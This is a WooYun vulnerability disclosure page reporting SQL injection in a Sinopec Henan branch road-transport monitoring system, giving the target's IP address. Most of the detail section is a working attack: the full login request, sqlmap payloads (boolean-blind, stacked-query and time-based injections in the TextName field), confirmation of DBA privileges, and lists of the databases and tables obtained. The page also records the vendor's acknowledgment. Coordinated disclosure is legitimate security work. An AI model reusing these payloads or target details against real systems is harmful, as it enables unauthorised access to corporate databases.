当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145880

漏洞标题:中国石化某分公司运输系统SQL注入漏洞(DBA权限/涉及7个数据库)

相关厂商:中国石油化工股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-11 09:18

修复时间:2015-11-28 10:00

公开时间:2015-11-28 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

233333333333333

详细说明:

中石化河南石油分公司公路运输监控系统:

http://116.255.245.4/


1.png


测试:

GET /First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=
%2FwEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9Z
AIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K%2BB56CB6ZSZ6K
%2BvZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9%2FncBgGjrjotw%3D%3D&__EVENTVALIDATION=%2FwEWCAKYnoDGBQK%2FzIJyAu
%2BL3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q%2BB2dnsBxZQ82IgNMvpwYB2Yg%3D&TextName=admin&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Referer: http://116.255.245.4/First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=
%2FwEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9Z
AIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dGVkZBgBBR5fX0NvbnRyb2xzUmVxdWly
ZVBvc3RCYWNrS2V5X18WAQUKQ2hhbmdlQ29kZYtYv9GQsL%2FHP1r3%2FrC0k89yK3VJ&__EVENTVALIDATION=%2FwEWCALJoOOABwK%2FzIJyAu%2BL3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KuUeOZsKX
%2FT764Da7qzFiJlVc1zs%3D&TextName=admin&TextPassword=admin&Validator=H202&Button1=%E7%99%BB%E5%BD%95
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 116.255.245.4
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=wv15ag45yrjbgczcbxqb1qbs; yzmcode=D0T8

漏洞证明:

数据库:

available databases [7]:
[*] [ZSHJK-HN]
[*] [ZSHJK-NX]
[*] alarmimage
[*] master
[*] model
[*] msdb
[*] tempdb


权限:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TextName (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMv
pwYB2Yg=&TextName=admin';IF(1278=1278) SELECT 1278 ELSE DROP FUNCTION aEzX--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMv
pwYB2Yg=&TextName=admin';WAITFOR DELAY '0:0:5'--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMv
pwYB2Yg=&TextName=admin' WAITFOR DELAY '0:0:5'--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95
---
[20:21:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[20:21:30] [INFO] testing if current user is DBA
current user is DBA: True


ZSHJK-HN:

[79 tables]
+------------------+
| BJLX |
| BaoJing |
| CLDD |
| CLZT |
| CheDui |
| CheLiang |
| DZSLX |
| DiSh@ |
| GPS |
| GPSZT |
| GpsZX |
| JKCS |
| LSJFCS |
| LSSDBJ |
| LSSFCS |
| LSSuoDD |
| LSSuoDK |
| LSSuoYC |
| LSWSFBJ |
| LSZKDK |
| Lin@ |
| QFKLX |
| QQZT |
| QianFeng |
| QianFengKa |
| QuanXian |
| SJZT |
| SPBaoJing |
| SPZX |
| SiJi |
| V_BaoJing |
| V_BaoJingZP |
| V_CLQF |
| V_CheDuiDiShi |
| V_CheLiang |
| V_DDXX |
| V_DDXX_MD |
| V_DDXX_YY |
| V_DiaoDu |
| V_JFCS |
| V_JKCL |
| V_JKMax |
| V_JKMaxAll |
| V_JKSD |
| V_JKSDHigh |
| V_JKSDLong |
| V_JKSJ |
| V_JKXH |
| V_QFBJ |
| V_QianFeng |
| V_QianFengKa |
| V_SFCS |
| V_SUODD |
| V_SUODK |
| V_SUOYC |
| V_SiJi |
| V_VehicleMoniter |
| V_WSFLK |
| V_YJQF |
| V_YJQianFeng |
| V_YJQianFengList |
| V_YongHu |
| V_Youzhan |
| V_ZKDK |
| V_data |
| V_yzyh |
| WCZT |
| YJQianFeng |
| YSZT |
| YZLX |
| YongHu |
| YouZhan |
| bd_t_offset |
| dtproperties |
| t_data |
| t_datanew |
| t_dzzl |
| t_dzzl_gps |
| t_offset |
+------------------+

修复方案:

没有继续深入

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-14 09:59

厂商回复:

谢谢!我们将尽快整改。

最新状态:

暂无